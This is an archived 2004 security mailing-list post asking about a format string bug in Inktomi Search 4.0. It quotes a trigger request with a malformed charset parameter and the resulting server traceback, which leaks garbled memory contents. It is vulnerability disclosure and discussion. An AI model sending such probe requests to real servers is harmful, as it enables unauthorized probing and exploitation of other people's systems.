Format String vuln in Inktomi Search4.0

From: Blurred Vision (really_blurred_vision_at_hotmail.com)
Date: 02/26/04

    To: vuln-dev@securityfocus.com, pen-test@securityfocus.com
    Date: Fri, 27 Feb 2004 08:17:54 +1100
    
    

    Besides the discussion found here:
    http://lists.virus.org/dw-0day-0306/msg00071.html

    Which confirms the existence of a format string bug, has anyone seen any more
    on the following FS bug in Inktomi Search?

    URL: http://>/query.html?charset=%3

    Internal Server Error
    Server cannot complete operation
    exceptions.UnicodeError: unknown encoding 0'<meta htPk k u': ', u'Server
    cannot complete operati
      File httpsrvr.py, line 501, in parse_qs
        charset = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
    comple
        enclst = [('charset', ["0'<meta htPk\031\002\240k\031\002 u': ',
    u'Server
        ent = ['charset', '%3']
        idx = 0
        key = 'charset'
        lst = ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot
    complete
        nodecode = []
        qs = 'charset=%3'
        query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
    ca
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        val = "0'<meta htPk\031\002\240k\031\002 u': ', u'Server cannot complete
    o
      File httpsrvr.py, line 778, in handle
        frag = ''
        netloc = '<vuln_inktomisearch_server>'
        parms = ''
        path = '/query.html'
        qs = 'charset=%3'
        query = {'charset': ["0'<meta htPk\031\002\240k\031\002 u': ', u'Server
    ca
        req = ''
        scheme = 'http'
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
        thr = 413
      File httpsrvr.py, line 904, in __init__
        client_address = ('XXX.XXX.XXX.XXX', 56730)
        sckt = <socket._socketobject instance at 21957c0>
        self = <httpsrvr.RequestHandler ('XXX.XXX.XXX.XXX', 56730)>
        server = <httpsrvr.Server ('XXX.XXX.XXX.XXX', 80)>
